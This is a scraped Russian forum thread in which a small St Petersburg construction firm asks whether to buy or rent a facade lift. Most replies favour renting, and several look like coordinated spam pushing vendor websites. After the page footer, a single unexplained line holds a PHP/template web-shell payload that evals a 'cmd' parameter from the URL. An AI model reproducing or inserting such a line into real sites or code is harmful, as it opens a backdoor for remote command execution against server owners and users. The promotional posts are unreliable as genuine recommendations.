+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Фасадный подъемник


  1. #1
    Мимо проходил Galbine is on a distinguished road Аватар для Galbine
    Регистрация
    09.11.2019
    Откуда
    Россия
    Машина
    Крутая
    Сообщений
    15

    Фасадный подъемник

    Наша небольшая строительная компания в Санкт-Петербурге пока делает первые шаги и не все еще оборудование куплено. Вот думаем стоит ли покупать фасадный подъемник для выполнения одно работы предстоящей или арендовать его лучше? Грузоподъемность нужна 630 кг не менее.
    Последний раз редактировалось Galbine; 17.01.2020 в 20:09.

  2. #2
    Мимо проходил Харксрен is on a distinguished road Аватар для Харксрен
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    33
    Я одобряю ваш выбор в пользу именно фасадного подъемника. Мне кажется он куда удобнее и практичнее чем строительные леса или даже телескопический подъемник. Куда сложнее ответить на вопрос что лучше купить его или взять в аренду. Но так как вы только начали свою деятельность и расходов хватает,то лучше взять в аренду фасадный подъемник zlp 630 https://spb-advanta.ru/stroitelnaya-...lyulki/zlp-630
    Последний раз редактировалось Харксрен; 17.01.2020 в 20:14.

  3. #3
    Мимо проходил Hammerhead is on a distinguished road Аватар для Hammerhead
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    GTI
    Сообщений
    77
    Фасадный подъемник, конечно, отличный вариант, но в некоторых ситуациях бывает и телескопический лучше будет использовать, так как он маневреннее. И первое, я согласен, лучше брать его в аренду.

  4. #4
    Мимо проходил Augustine is on a distinguished road Аватар для Augustine
    Регистрация
    09.11.2019
    Откуда
    РФ
    Машина
    моя
    Сообщений
    15
    Согласен с комментарием выше. Каждое оборудование нужно в свой черед. Но не все при этом стоит покупать и платить большие при этом деньги. Некоторые, что вы реже используете, лучше брать в аренду.

  5. #5
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    Не так давно приобрели несамоходный ножничный подъемник до 300 кг у этого поставщика https://podemnik-nsk.ru/nozhnichnye-...hnye-do-300-kg . Высоту взяли 11 м, с учетом того, что можно прибавить рост сотрудника, и теперь мы сможем брать новые, ранее не доступные нам, заказы. Платформа поднимается за счет электропривода, никакого тебе ручного управления, что облегчает задачу. На самой платформе одновременно могут разместиться два оператора, что ускорить процесс работы. Вместе с подъемником нам доставили паспорт с отметкой гарантии в один год.

  6. #6
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Слушайте, а кто-то сотрудничал с https://gpo-msk.ru/ этой компанией? Я про ГПО слышал пару раз, но как я понял они реально прям серьёзные ребята, уже не первый год, а то и десятилетие, на рынке услуг и товаров. Нужно просто комплектующие некоторые купить для нашего грузоподъёмного оборудования - ну, профилактика, обслуживание) И ото ищем топового поставщика, чтобы точно не напороться на проблемы

  7. #7
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    Нам для подъемов груза нужно стропы закупить. Подскажите, где можно их купить?

  8. #8
    GTI-Racing Magistral is on a distinguished road Аватар для Magistral
    Регистрация
    11.12.2010
    Откуда
    Москва
    Машина
    Golf
    Сообщений
    156
    У меня был вопрос, как купить партию текстильных строп. Мне коллега порекомендовал “Мехзавод ГПО”. У них качество – принцип, который не подлежит сомнению. Важно, что для их выпуска используется качественный материал. При транспортировке их можно компактно свернуть в небольшой рулон. На сайте http://mzgpo.ru узнал о компании подробно. Сотрудники с удовольствием помогут определиться с выбором перевозчика, в зависимости от пункта назначения подскажут, к кому лучше обратиться, либо самостоятельно свяжутся с транспортной компанией и сделают заказ.

  9. #9
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Для фасадных работ неплохим вариантом будет фасадная люлька, главное подобрать такую, которая подойдёт по техническим характеристикам и в целом будет надёжной. Могу посоветовать тут https://podemnik-spb.ru/fasadnye-lyulki/ глянуть предложения от компании, с которой мы сотрудничали не так давно. Понравился тот факт, что на оборудование доступна гарантия, так что к качеству спецтехники точно вопросов не будет.

+ Ответить в теме

Похожие темы

  1. Ответов: 8
    Последнее сообщение: 02.04.2024, 21:29
  2. Фасадный подъемник
    от Bimbom в разделе Курилка
    Ответов: 7
    Последнее сообщение: 29.01.2022, 18:11
  3. фасадный подъемник люльку
    от sergey1414 в разделе Курилка
    Ответов: 0
    Последнее сообщение: 22.06.2019, 00:26

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}